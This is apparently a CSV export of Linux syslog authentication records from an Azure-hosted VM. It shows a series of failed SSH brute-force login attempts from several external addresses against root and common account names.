+5788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:42,UbuntuDevEnv,2019-06-26 16:30:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:43,UbuntuDevEnv,2019-06-26 16:30:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+5790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:43,UbuntuDevEnv,2019-06-26 16:30:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:43,UbuntuDevEnv,2019-06-26 16:30:42,auth,UbuntuDevEnv,info,Invalid user guest from 171.8.199.77 port 39366,36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,171.8.199.7,39366,,
+5792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:44,UbuntuDevEnv,2019-06-26 16:30:44,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 33916 ssh2,36824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33916,,
+5793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:44,UbuntuDevEnv,2019-06-26 16:30:44,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 33916 [preauth],36824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,33916,,
+5794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:44,UbuntuDevEnv,2019-06-26 16:30:44,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 33916:11: Normal Shutdown, Thank you for playing [preauth]",36824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33916,,
+5795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:45,UbuntuDevEnv,2019-06-26 16:30:44,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 171.8.199.77 port 39366 ssh2,36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,171.8.199.7,39366,,
+5796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:45,UbuntuDevEnv,2019-06-26 16:30:45,auth,UbuntuDevEnv,info,Invalid user ftptest from 119.59.113.183 port 58194,36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,119.59.113.1,58194,,
+5797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:45,UbuntuDevEnv,2019-06-26 16:30:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:45,UbuntuDevEnv,2019-06-26 16:30:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:46,UbuntuDevEnv,2019-06-26 16:30:45,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 39366:11: Bye Bye [preauth],36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,39366,,
+5800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:46,UbuntuDevEnv,2019-06-26 16:30:45,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 171.8.199.77 port 39366 [preauth],36818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,171.8.199.7,39366,,
+5801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:47,UbuntuDevEnv,2019-06-26 16:30:46,auth,UbuntuDevEnv,info,Failed password for invalid user ftptest from 119.59.113.183 port 58194 ssh2,36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,119.59.113.1,58194,,
+5802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:47,UbuntuDevEnv,2019-06-26 16:30:47,auth,UbuntuDevEnv,info,Disconnected from invalid user ftptest 119.59.113.183 port 58194 [preauth],36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftptest,119.59.113.1,58194,,
+5803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:47,UbuntuDevEnv,2019-06-26 16:30:47,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 58194:11: Bye Bye [preauth],36832,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,58194,,
+5804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:52,UbuntuDevEnv,2019-06-26 16:30:51,auth,UbuntuDevEnv,info,Invalid user ubuntu from 119.59.113.183 port 58526,36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.59.113.1,58526,,
+5805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:52,UbuntuDevEnv,2019-06-26 16:30:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:52,UbuntuDevEnv,2019-06-26 16:30:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:53,UbuntuDevEnv,2019-06-26 16:30:53,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 119.59.113.183 port 58526 ssh2,36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.59.113.1,58526,,
+5808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:53,UbuntuDevEnv,2019-06-26 16:30:53,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 119.59.113.183 port 58526 [preauth],36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,119.59.113.1,58526,,
+5809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:53,UbuntuDevEnv,2019-06-26 16:30:53,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 58526:11: Bye Bye [preauth],36864,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,58526,,
+5810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,auth,UbuntuDevEnv,info,Invalid user git from 66.70.130.155 port 60706,36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,66.70.130.1,60706,,
+5811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,auth,UbuntuDevEnv,info,Invalid user zabbix from 119.59.113.183 port 58856,36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,119.59.113.1,58856,,
+5814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:58,UbuntuDevEnv,2019-06-26 16:30:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:59,UbuntuDevEnv,2019-06-26 16:30:59,auth,UbuntuDevEnv,info,Failed password for invalid user git from 66.70.130.155 port 60706 ssh2,36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,66.70.130.1,60706,,
+5817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:59,UbuntuDevEnv,2019-06-26 16:30:59,auth,UbuntuDevEnv,info,Disconnected from invalid user git 66.70.130.155 port 60706 [preauth],36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,66.70.130.1,60706,,
+5818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:30:59,UbuntuDevEnv,2019-06-26 16:30:59,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 60706:11: Bye Bye [preauth],36883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,60706,,
+5819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:00,UbuntuDevEnv,2019-06-26 16:30:59,auth,UbuntuDevEnv,info,Failed password for invalid user zabbix from 119.59.113.183 port 58856 ssh2,36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,119.59.113.1,58856,,
+5820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:00,UbuntuDevEnv,2019-06-26 16:31:00,auth,UbuntuDevEnv,info,Disconnected from invalid user zabbix 119.59.113.183 port 58856 [preauth],36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zabbix,119.59.113.1,58856,,
+5821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:00,UbuntuDevEnv,2019-06-26 16:31:00,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 58856:11: Bye Bye [preauth],36882,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,58856,,
+5822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:04,UbuntuDevEnv,2019-06-26 16:31:03,auth,UbuntuDevEnv,info,Invalid user cirros from 119.59.113.183 port 59188,36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,119.59.113.1,59188,,
+5823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:04,UbuntuDevEnv,2019-06-26 16:31:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:04,UbuntuDevEnv,2019-06-26 16:31:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:05,UbuntuDevEnv,2019-06-26 16:31:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,36914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:05,UbuntuDevEnv,2019-06-26 16:31:05,auth,UbuntuDevEnv,info,Failed password for invalid user cirros from 119.59.113.183 port 59188 ssh2,36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,119.59.113.1,59188,,
+5827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:05,UbuntuDevEnv,2019-06-26 16:31:05,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 59188:11: Bye Bye [preauth],36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,59188,,
+5828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:05,UbuntuDevEnv,2019-06-26 16:31:05,auth,UbuntuDevEnv,info,Disconnected from invalid user cirros 119.59.113.183 port 59188 [preauth],36902,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cirros,119.59.113.1,59188,,
+5829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:06,UbuntuDevEnv,2019-06-26 16:31:06,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 37216 ssh2,36914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37216,,
+5830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:06,UbuntuDevEnv,2019-06-26 16:31:06,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 37216 [preauth],36914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,37216,,
+5831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:06,UbuntuDevEnv,2019-06-26 16:31:06,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 37216:11: Normal Shutdown, Thank you for playing [preauth]",36914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37216,,
+5832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:10,UbuntuDevEnv,2019-06-26 16:31:09,auth,UbuntuDevEnv,info,Invalid user vpn from 119.59.113.183 port 59518,36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,119.59.113.1,59518,,
+5833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:10,UbuntuDevEnv,2019-06-26 16:31:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:10,UbuntuDevEnv,2019-06-26 16:31:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:12,UbuntuDevEnv,2019-06-26 16:31:11,auth,UbuntuDevEnv,info,Failed password for invalid user vpn from 119.59.113.183 port 59518 ssh2,36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,119.59.113.1,59518,,
+5836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:12,UbuntuDevEnv,2019-06-26 16:31:11,auth,UbuntuDevEnv,info,Disconnected from invalid user vpn 119.59.113.183 port 59518 [preauth],36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vpn,119.59.113.1,59518,,
+5837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:12,UbuntuDevEnv,2019-06-26 16:31:11,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 59518:11: Bye Bye [preauth],36932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,59518,,
+5838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:23,UbuntuDevEnv,2019-06-26 16:31:22,auth,UbuntuDevEnv,info,Invalid user sandeep from 119.59.113.183 port 59848,36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,119.59.113.1,59848,,
+5839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:23,UbuntuDevEnv,2019-06-26 16:31:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183,36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.59.113.1,,0,
+5840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:23,UbuntuDevEnv,2019-06-26 16:31:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:25,UbuntuDevEnv,2019-06-26 16:31:24,auth,UbuntuDevEnv,info,Failed password for invalid user sandeep from 119.59.113.183 port 59848 ssh2,36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,119.59.113.1,59848,,
+5842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:25,UbuntuDevEnv,2019-06-26 16:31:24,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 59848:11: Bye Bye [preauth],36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,59848,,
+5843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:25,UbuntuDevEnv,2019-06-26 16:31:24,auth,UbuntuDevEnv,info,Disconnected from invalid user sandeep 119.59.113.183 port 59848 [preauth],36956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sandeep,119.59.113.1,59848,,
+5844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:27,UbuntuDevEnv,2019-06-26 16:31:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.59.113.183  user=test,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,119.59.113.1,,0,
+5845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:29,UbuntuDevEnv,2019-06-26 16:31:28,auth,UbuntuDevEnv,info,Failed password for test from 119.59.113.183 port 60188 ssh2,37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,60188,,
+5846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:29,UbuntuDevEnv,2019-06-26 16:31:29,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 119.59.113.183 port 60188 [preauth],37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,119.59.113.1,60188,,
+5847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:31:29,UbuntuDevEnv,2019-06-26 16:31:29,auth,UbuntuDevEnv,info,Received disconnect from 119.59.113.183 port 60188:11: Bye Bye [preauth],37003,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.59.113.1,60188,,
